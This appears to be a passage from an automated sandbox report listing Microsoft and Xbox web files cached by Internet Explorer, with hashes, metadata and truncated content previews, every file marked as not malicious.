                                                                                                                                                                                                              IE Cache URL:https://c.s-microsoft.com/en-us/CMSScripts/script.jsx?k=fdbb2b09-be08-eb51-3dd8-9b4d1f64243f_2ae8129d-fde8-2dba-04a3-244180de8ae9_47e83ccc-ecfc-6f98-b981-755b2bfad91f_286673de-a0d8-5a7d-a0cb-28aaf9428fbf_e151f4c7-d675-33c5-e63f-d0492e9ef34c_da6fc213-c3d8-dcb6-1429-16b93fa0ee4d_758972cb-d321-e5b7-3cef-28d8b1bcb5f7_b02da3f0-b00e-ca1f-59d4-f9dee84deb72_b87dcf1d-d924-ca9e-d82d-b5ddf52216b6_12cfa907-5165-8e09-aef4-3b571e0d9a6f_afc628e5-eae9-c661-5322-66ad905c5a1f_4b6a647a-20b1-6c9d-7ea9-55baee524342_0672bcaf-3214-8196-63f9-badec82b5521_c8e45edc-7732-8d91-49e3-ab3224fe8bae_f6523997-afd8-42bc-ae14-d8d1455c6de1_aa8b03c9-0fe4-f89f-0b29-3903983e74d0_8b6018a0-61bc-151c-2351-a7a50d347fe5_04ba3982-e58b-6415-57b8-bd40addb5c6f_6ef97ac9-cbfe-73e0-a706-6f05baf3f4bc_d85b532d-4104-bd94-affe-35a64db2dffb_342faa43-5d79-89a1-4f75-637e916585c0_1ad26ef8-7f3b-47aa-bbbe-8522a7a460ba_b9e71751-e6fb-7c2f-10dd-905e9e0531c4_de15b5ee-705b-f4d1-c22a-30e0bb76b881_ddb2b35f-0052-8ff2-85d1-a86c728272a1
                                                                                                                                                                                                              Preview: function changeSupToAnchor(){var t="",r="",n=[],i=[],u=0,f;$(".pmp-devices .supFn, .cfb .supFn").each(function(n){i[n]=$(this).text();$(this).parent().attr("href","#"+i[n]+"superscript");$(this).parent().attr("id",i[n])});f=$("#ss-footnote-text").text();$(".pmp-devices sup, .cfb sup").each(function(){t=$(this).text();t=t.replace("*(","");t=t.replace(")","");n=t.split(", ");for(let t=0;t<n.length;t++)for(let e=0;e<i.length;e++)if(n[t]==i[e]){r+="<a aria-label='"+f+" "+n[t]+"' href='#"+n[t]+"' name= '"+n[t]+"superscript' class='c-hyperlink supBLink'><span class='supText'>"+n[t]+"<\/span><\/a><span>, <\/span>";u=1;break}u==1&&($(this).html(r),r="",u=0)});$(".pmp-devices sup, .cfb sup").find("span:last").remove()}function tooltipOnFocus(){$(".surface-social-share a,.m-video-trigger button").focus(function(n){var t=this;t.t=JSON.parse(JSON.stringify(t.title));t.title="";var i=$(n.currentTarget).offset(),r=$(n.currentTarget).height(),u=$(n.currentTarget).width();$("body").append("<span id='c
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\sno-byrd[1].css
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:UTF-8 Unicode text, with very long lines, with CRLF, LF line terminators
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):33999
                                                                                                                                                                                                              Entropy (8bit):4.8046760641119075
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:pzJx5o8RJNQ8Iq6oXxv8hDM5BJ414n7i4ejmjNjIj/NRfXrc2P/AgjijVgbhFFUl:pzJ7o8RJNQ8Iq6oXxv8hDM5BJ414n7ik
                                                                                                                                                                                                              MD5:B1369BAB4D0AF467C15D61EB9A915F35
                                                                                                                                                                                                              SHA1:62EEEC75A0E90CDC8AFF5B6BE2A448F25923A97C
                                                                                                                                                                                                              SHA-256:6EAC14F5CAEFB8AD32908761AA3F519153D49EEDC92C52F7B3541777516C7E06
                                                                                                                                                                                                              SHA-512:813AB69C7162090F4CB342CC7C208D3A6978D50D6CF2812F89A87834DC89DFA564053CA10CDC0947B5F4A4ACD4ED8A0004785643220981DCDB3A87D2758A1CD5
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://www.xbox.com/en-US/global-resources/templates/MWF/CSS/sno-byrd.css
                                                                                                                                                                                                              Preview: /* custom snow bird overrides*/..c-drawer>button[aria-expanded="false"]::before, .c-drawer .f-toggle[aria-expanded="false"]::before, .c-drawer>header>button[aria-expanded="false"]::before, .c-drawer>header .f-toggle[aria-expanded="false"]::before, .c-drawer .c-drawer-toggle[aria-expanded="false"]::before {. content: "." !important;.}...c-paragraph-1, .c-paragraph-2 {. font-weight: 400 !important;.}..c-heading, .c-heading-1, .c-heading-2, .c-heading-3, .c-heading-4 {.font-weight: 700 !important;.}..m-content-placement-item .c-heading, .m-content-placement-item .c-heading-1,..m-content-placement-item .c-heading-2, .m-content-placement-item .c-heading-3,..m-content-placement-item .c-heading-4 {.font-weight: 600 !important;.}....c-heading-1a {. padding: 6px 0 6px;. font-weight: 700;. letter-spacing: -0.01em;. font-family: SegoeProBlack, Segoe UI,SegoeUI,Helvetica,Arial,sans-serif;.}....c-heading-1L {. padding: 6px 0 6px;. font-weight: 700;. letter-spacing: -0.0
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\social[1].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):112978
                                                                                                                                                                                                              Entropy (8bit):5.163861138977889
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:GV8Utc49kADAKlyvpkmO5KqqVkii7nmFMfW6znlLXAirhnlOc8Azngzhe9WOU0RM:slyvpklZYWtzkAzg
                                                                                                                                                                                                              MD5:AE0935FF464917159FE28FB684DE6BC3
                                                                                                                                                                                                              SHA1:ADFF2BFEA6BC0129E2634639EB89BB1CDC43A05D
                                                                                                                                                                                                              SHA-256:172BEB2DDE1857755325F5BA1E6F7A4212CA1439C9CA73FBC5FF81C35A5579BE
                                                                                                                                                                                                              SHA-512:408DD35EF31CACB16035609E8F2D3FF8C241B22112738B0EA97E99E8367BDC33D2601FD196AD29905215D8B1DC123E7057968388DEDD140395E88638AC3FD124
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://www.microsoft.com/mwf/js/MWF_20210208_31270267/alert/autosuggest/contentplacement/contentplacementitem/flipper/flyout/glyph/heading/hero/heroitem/hyperlinkgroup/image/list/pagebehaviors/singleslidecarousel/skiptomain/social?apiVersion=1.0
                                                                                                                                                                                                              Preview: define("componentFactory",["require","exports","htmlExtensions","utility","stringExtensions","pageBehaviors"],function(n,t,i,r,u,f){"use strict";Object.defineProperty(t,"__esModule",{value:!0});var e=function(){function n(){}return n.create=function(t){for(var i,r=0,u=t;r<u.length;r++){if(i=u[r],!i.c&&!i.component)throw"factoryInput should has either component or c to tell the factory what component to create.Eg.ComponentFactory.create([{ c: Carousel] or ComponentFactory.create([component: Carousel]))";n.createComponent(i.component||i.c,i)}},n.createComponent=function(t,r){if(t){var o=r&&r.eventToBind?r.eventToBind:"",f=r&&r.selector?r.selector:t.selector,s=r&&r.context?r.context:null,u=[],e=function(n,f,e){var a,c,l,o,h;for(a=r.elements?r.elements:f?i.selectElementsT(f,s):[document.body],c=0,l=a;c<l.length;c++)o=l[c],o?(o.mwfInstances||(o.mwfInstances={}),o.mwfInstances[n]?u.push(o.mwfInstances[n]):(h=new t(o,e),(!h.isObserving||h.isObserving())&&(o.mwfInstances[n]=h,u.push(h)))):cons
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\social[2].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):190576
                                                                                                                                                                                                              Entropy (8bit):5.199665651838637
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:+c49kADAKCV8UJyvpoKqqCWO6wDNEUR9qVaMNk+Q4EMQgKgaeX81f1FOrbFLn6lw:awyvpoZRRF/apF7puOx8w2tzsV
                                                                                                                                                                                                              MD5:AF64C8E4512E5AB7EDE26359AE46FEEA
                                                                                                                                                                                                              SHA1:10D39FBF6A8EC8925B8D34D7F43C68203BB53589
                                                                                                                                                                                                              SHA-256:DEEAE4843EB52B5E2E9C34E38D168FB872FD1E002C1D2DA3FD690E9EBF8E30B1
                                                                                                                                                                                                              SHA-512:61F34D6FBD5E998D742E93AB66EBF8DC1E8AC58A89CD309C91C6309BB50E28D5D6F246088B9D3553FB41BF787497A79EF66BD6091E23A0271E65E8BE3D556038
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://www.microsoft.com/mwf/js/MWF_20210208_31270267/actiontoggle/alert/ambientvideo/areaheading/autosuggest/button/contentplacement/contentplacementitem/dialog/divider/drawer/glyph/heading/hero/heroitem/hyperlinkgroup/image/imageintro/list/mosaicplacement/multislidecarousel/pagebehaviors/productplacement/rating/skiptomain/slider/social?apiVersion=1.0
                                                                                                                                                                                                              Preview: require(["tooltip","componentFactory"],function(n,t){t.ComponentFactory&&t.ComponentFactory.create&&t.ComponentFactory.create([{component:n.Tooltip}])});define("observableComponent",["require","exports","htmlExtensions"],function(n,t,i){"use strict";Object.defineProperty(t,"__esModule",{value:!0});var r=function(){function n(t,i){i===void 0&&(i=null);this.element=t;this.ignoreNextDOMChange=!1;this.observing=!1;n.shouldInitializeAsClass(t,i)&&this.setObserver()}return n.prototype.detach=function(){this.unObserve();this.teardown()},n.prototype.isObserving=function(){return this.observing},n.prototype.unObserve=function(){this.observing=!1;this.modernObserver&&this.modernObserver.disconnect();i.removeEvent(this.element,i.eventTypes.DOMNodeInserted,this.obsoleteNodeInsertedEventHander);i.removeEvent(this.element,i.eventTypes.DOMNodeRemoved,this.obsoleteNodeRemovedEventHandler)},n.prototype.setObserver=function(){this.observing=!0;typeof n.mutationObserver!="undefined"?this.observeModern():
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\teams.64x64x32[1].png
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):5830
                                                                                                                                                                                                              Entropy (8bit):7.876764556676804
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:3llcHitlIxv9vk7C1+I4wWHLihk/x6YzDZKZkte+DQeO15XaznWkWerPbNb3sq0S:8IIHUCD4waJXg1tailerPpYs
                                                                                                                                                                                                              MD5:721F82921828039393680B1E0A6C0991
                                                                                                                                                                                                              SHA1:56DD738F186B17A4C0C529BDFC8F1063AC9FEA06
                                                                                                                                                                                                              SHA-256:8CDD76734097623D3C4922EBA358328070AEECD955FA0CB1A2C5C822D29E8570
                                                                                                                                                                                                              SHA-512:C7E2850AF42651E52066C75B527604410155E304F5BAF9C895AE63399968DE46E04322FCD4963763F2882AEA7D8EE3BC36ED9DF181F18A2717434B53B76FB175
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://support.microsoft.com/socimages/appicons/teams.64x64x32.png
                                                                                                                                                                                                              Preview: .PNG........IHDR...@...@......iq....CiCCPICC profile..x.SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m....... ......O......:..L..$R...J5e?
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\upgrade-to-windows-10-faq-cce52341-7943-594e-72ce-e1cf00382445[1].htm
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:HTML document, UTF-8 Unicode text, with very long lines, with CRLF, LF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):107688
                                                                                                                                                                                                              Entropy (8bit):5.22840683237752
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:NP4T7rBBP1BM6UKjYcWgeMvqrJZEzbfP/G0u9Cznq+xLCiT7dnPj1q0:NP4T7rBBRUGeMvqrjEX3Ru9EFxLCi19
                                                                                                                                                                                                              MD5:08073FD9A87F8AC076F8C00B0AE6C702
                                                                                                                                                                                                              SHA1:83C5FF3BA016018751E2B3B8577A09AA4741C251
                                                                                                                                                                                                              SHA-256:8075DB2AE7B50BB6815A53E21D6B5263D4061DAA102BB771423A822E8AC2454E
                                                                                                                                                                                                              SHA-512:7014AF5427380D0D814E6FB74C0F66416BBDDC3F325CF78EF59E8168B7E8BB81539D80CDA3AE0ADD0AC2BC853A7DF4B9706D4F2C4237658FFC046C53A8B885A7
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: ..<!DOCTYPE html>..<html lang="en-US" dir="ltr">..<head>...<meta charset="utf-8" />...<meta name="viewport" content="width=device-width, initial-scale=1.0" />...<title>Upgrade to Windows 10: FAQ</title>......<link rel="canonical" href="https://support.microsoft.com/en-us/windows/upgrade-to-windows-10-faq-cce52341-7943-594e-72ce-e1cf00382445" />...<meta name="robots" content="noindex,nofollow,nosnippet,noodp,noydir" />...<meta name="description" content="How to upgrade your device or buy a new device running Windows 10." />...<meta name="firstPublishedDate" content="2020-10-01" />...<meta name="awa-kb_id" content="12435" />...<meta name="lastPublishedDate" content="2021-04-30" />...<meta name="ms.lang" content="en" />...<meta name="ms.loc" content="US" />...<meta name="ms.product" content="c6cab6e3-6598-6a1f-fbb2-f66d3740139d,f825ca23-c7d1-aab8-4513-64980e1c3007,b2012b15-7770-3165-b934-5b004ee86f67" />...<meta name="ms.productName" content="Windows 10,Windows 7,Windows 8.1" />...<meta n
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\wcp-consent[1].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):255440
                                                                                                                                                                                                              Entropy (8bit):6.051861579501256
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6144:PIgagvUI0iDsW9Whsredo7NjIZjIZP0aNWgF9Dyjzh:PIgaHI0iIUedo7NjIZjIZP0o74t
                                                                                                                                                                                                              MD5:38B769522DD0E4C2998C9034A54E174E
                                                                                                                                                                                                              SHA1:D95EF070878D50342B045DCF9ABD3FF4CCA0AAF3
                                                                                                                                                                                                              SHA-256:208EDBED32B2ADAC9446DF83CAA4A093A261492BA6B8B3BCFE6A75EFB8B70294
                                                                                                                                                                                                              SHA-512:F0A10A4C1CA4BAC8A2DBD41F80BBE1F83D767A4D289B149E1A7B6E7F4DBA41236C5FF244350B04E2EF485FDF6EB774B9565A858331389CA3CB474172465EB3EF
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://wcpstatic.microsoft.com/mscc/lib/v2/wcp-consent.js
                                                                                                                                                                                                              Preview: var WcpConsent=function(e){var a={};function i(n){if(a[n])return a[n].exports;var o=a[n]={i:n,l:!1,exports:{}};return e[n].call(o.exports,o,o.exports,i),o.l=!0,o.exports}return i.m=e,i.c=a,i.d=function(e,a,n){i.o(e,a)||Object.defineProperty(e,a,{enumerable:!0,get:n})},i.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},i.t=function(e,a){if(1&a&&(e=i(e)),8&a)return e;if(4&a&&"object"==typeof e&&e&&e.__esModule)return e;var n=Object.create(null);if(i.r(n),Object.defineProperty(n,"default",{enumerable:!0,value:e}),2&a&&"string"!=typeof e)for(var o in e)i.d(n,o,function(a){return e[a]}.bind(null,o));return n},i.n=function(e){var a=e&&e.__esModule?function(){return e.default}:function(){return e};return i.d(a,"a",a),a},i.o=function(e,a){return Object.prototype.hasOwnProperty.call(e,a)},i.p="",i(i.s=1)}([function(e,a,i){window,e.exports=function(e){var a={};function i(n)
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\wdg-global.min[1].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:UTF-8 Unicode text, with very long lines
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):5805
                                                                                                                                                                                                              Entropy (8bit):5.278923653755367
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:UKbTXTwvME3A3UmUZZH//iuLXFgH5XsrhUfGtA4DtPigKUZwr9reeKMQTesOnOsA:5bTXTwYwHn6C1UfGtzB6gvPziI3
                                                                                                                                                                                                              MD5:EF4613E3C20BFE5E3F07B49BD0B66C1E
                                                                                                                                                                                                              SHA1:EDE2835F716750EDC0245E2AF061732427F5A8ED
                                                                                                                                                                                                              SHA-256:3DC7C03D651B5E29363C365C3B83B83A508865A194639070A20ABD863FBBC054
                                                                                                                                                                                                              SHA-512:D8D6F060B4FCB2C781C8574BE01368BB8F25C314098BEF844859452DF88B77C9E7D088F190F111135F44C80F82F47F9AF4822240FEDEDD4F040F991CAE20EDC6
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RWfyex
                                                                                                                                                                                                              Preview: (function(n,t,i){"use strict";./*!. * Some of the plugins here are extracted from WET. Details below.. * Web Experience Toolkit (WET) / Bo.te . outils de l'exp.rience Web (BOEW). * wet-boew.github.io/wet-boew/License-en.html / wet-boew.github.io/wet-boew/Licence-fr.html. * v4.0.25-development - 2017-05-04 . */.var r=t.wdg||{};r.doc=n(i);r.win=n(t);r.html=n("html");r.siteMuseCtaSelector=".mscom-link.c-call-to-action";r.modules=r.modules||{};r.jqEscape=function(n){return n.replace(/([;&,\.\+\*\~':"\\\!\^\/#$%@\[\]\(\)=>\|])/g,"\\$1")};r.modules.refactorSitemuseCtas=function(){n(r.siteMuseCtaSelector).contents().wrap("<span/>")};r.modules.setPrefooterDrawerInMobile=function(){n("#prefooterDrawer").click(function(){var t=n("#prefooterNav");n(this).attr("aria-expanded",!t.is(":visible"));n("#prefooterNav").slideToggle()})};r.modules.noCookieYTVideosWithConsent=function(){t.mscc&&(mscc.hasConsent()||n('iframe[src*="youtube.com"], [data-source*="youtube.com"], [data-youtube*="youtube.com"]
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\windows.64x64x32[1].png
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):4280
                                                                                                                                                                                                              Entropy (8bit):7.800662473802656
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:3llcHitlIxv9vk7C1+I4wWHLihk/x6Yz6mHm1tTTw:8IIHUCD4waJ0M
                                                                                                                                                                                                              MD5:0157EBC241D0D5397DDD7D4A610AA6E7
                                                                                                                                                                                                              SHA1:A558411DC35D18DDA00356B82029238D26CF558C
                                                                                                                                                                                                              SHA-256:19D4B9C65CAB6778F199F55D4555A3551791302D2AEEDF6A5A3647CC5EFD7F39
                                                                                                                                                                                                              SHA-512:6F6FCD18E1CF56ACBC059B18BED0D8A7079E928731669BEFE2EF45C91D17BA6A8E3A962348A8442738DC3B589F3BA52E63FEEFDD864432FE352979E2832E469C
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://support.microsoft.com/socimages/appicons/windows.64x64x32.png
                                                                                                                                                                                                              Preview: .PNG........IHDR...@...@......iq....CiCCPICC profile..x.SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m....... ......O......:..L..$R...J5e?
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\xbox.64x64x32[1].png
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):5267
                                                                                                                                                                                                              Entropy (8bit):7.857808196595038
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:3llcHitlIxv9vk7C1+I4wWHLihk/x6Yz9o4toqa+tJx79kC+KbwwQ:8IIHUCD4waJ0gbZ+AM
                                                                                                                                                                                                              MD5:B70310DF97E7C3357CABF441B43420B2
                                                                                                                                                                                                              SHA1:45D337AC06225E1D2BA36D7055CD14AD6F7645FD
                                                                                                                                                                                                              SHA-256:E44260A2A21942834FBA64412665C2EE0D42D160EB5A2F37F708765917A21257
                                                                                                                                                                                                              SHA-512:D86735795FEAFB62B51C3DA151DF0A0F9FC6CAAFE3C48048CBD86C700DC864DC1BD4F773E612E92BF59DAE7B09E730746643CF884756E174BA305E53814F78C4
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://support.microsoft.com/socimages/appicons/xbox.64x64x32.png
                                                                                                                                                                                                              Preview: .PNG........IHDR...@...@......iq....CiCCPICC profile..x.SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m....... ......O......:..L..$R...J5e?
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\xdframe-single-domain-1.1.0[1].htm
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1798
                                                                                                                                                                                                              Entropy (8bit):5.186516642566808
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:A1Z6YoEzGeGMqsg08XLEOrO33tZ926Y5j+m:A1ZbzGeGMJg08XwNHtb26Y5j5
                                                                                                                                                                                                              MD5:895E1DEFCB016DA8DA1092F66778B99A
                                                                                                                                                                                                              SHA1:81AB9FA8597B27E62D6B33BEBE1FBDAAE44F9BEC
                                                                                                                                                                                                              SHA-256:BF7635163C0991525863F3B5EB809AB7770FCDD92DE0E916C162B8F1FBB71B1A
                                                                                                                                                                                                              SHA-512:264EFEE912CAB10ECF94A8F5118A4F2F524BD81DEAB4473B9F89756875517CF78C557F7B211954F2F998EBEE37A4B0E76DE78F9433399BE78194C7005AE95DA4
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: <!DOCTYPE html><html><head><meta charset="UTF-8"><meta name="robots" content="noindex"><script>!function(){function u(e,n){return n+"___"+e}function s(e){var n={error:e};window.parent.postMessage(n,"*")}function d(e){var n=new RegExp("(^|;)[ ]*"+e+"=([^;]*)").exec(document.cookie);return n?decodeURIComponent(n[2]):null}function m(n,e){return e.map(function(e){return u(n,e)}).reduce(function(e,n){var o=d(n);o&&(e[n.split("___")[0]]=o);return e},{})}function f(e,n,o,r,t,a,i){var c=e+"="+encodeURIComponent(n)+(o?";expires="+new Date(o).toUTCString():"")+(";path="+(t||"/"))+(";domain="+(r||document.domain))+(a&&"X"!==a?";SameSite="+a:"")+(i?";Secure":"");document.cookie=c}window.parent.postMessage(function(){var e=function(){var t={};location.search&&1<location.search.length&&location.search.substr(1).split("&").forEach(function(e){var n=e.split("="),o=n[0]&&decodeURIComponent(n[0]),r=n[1]&&decodeURIComponent(n[1]);t[o]=r});return t}();if(!e.pid||!e.cookieNames)return s("bad query param:"+
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\1399_Panel15_Mosaic_Item4_Laptop[1].jpg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 350x400, frames 3
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):25223
                                                                                                                                                                                                              Entropy (8bit):7.937925825399601
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:p6WUma0kKaVmyaKoJ+iQrBTkrIEEhsMgTl:cmqRMyaKsFQtT+IelTl
                                                                                                                                                                                                              MD5:224F6A2BDB36A0BF4066B3F7EA6CC0AB
                                                                                                                                                                                                              SHA1:E09A9A4EEBA72976F603C6CF6D06B9D91ECDD29C
                                                                                                                                                                                                              SHA-256:2A0B787A7485F910495B3596AC5BBA8C5214E7B0EF3E7ADDEEA4A8149302A20E
                                                                                                                                                                                                              SHA-512:66DBFF7E56664EF6542ADE99C0B3B09C8CED97CACD8A75F797411916177F1A2DEAC61264CF7B5970111D79DCA1C6C965737A95D108956F19B835C72036163344
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://c.s-microsoft.com/en-us/CMSImages/1399_Panel15_Mosaic_Item4_Laptop.jpg?version=e213da19-1fae-1c69-28a0-e9f84c6b3bb0
                                                                                                                                                                                                              Preview: ......JFIF........................................................................................................................................................^.........................................................o{m.......0....o..LH...........um.RH$!..........qiH..% @3@.T...^.D.fI.$.H..y;.e.G)L.e).I$....<......%)...JS2.O...8..@..G.=...<......ffS3Re..:........~s.v....L^9o.r]..r...U|s.=._...c..E......d....~.v.y7"..Fvu.3....|.[..9..].~...y.w....i..f.~.i....Nss.....\_..=....|....w...~/t.!.l.uU^..].sWVg!......fft'....m...i.-......]...%..;>M.,.`..v.$.ff.X..m.8....w.-x..8...Wv<.c...U\.rn....G.r......>.....Z./..../..q.V+.....28m[.A.........8_~.[.v...x.j...iu..\.a....F.qcA....].`...8gm..M...3M6...{//&...M......t.....l}.z..[.WE...5.W.U..]....}....]7s}.v.k...z....r+M..1.n.h.L.....O.5...^.Y...n.....cb_.mw...n.QM............sf..8z...C..].!...m.TM4.M..@0..>..'..-.j.ktcZ.b.V..ER....?u.k.>.>.....mX.E..,.Kv.Qj.tR..Uz`.....^.N.s>..V(.N-..5kSj.Y...~..
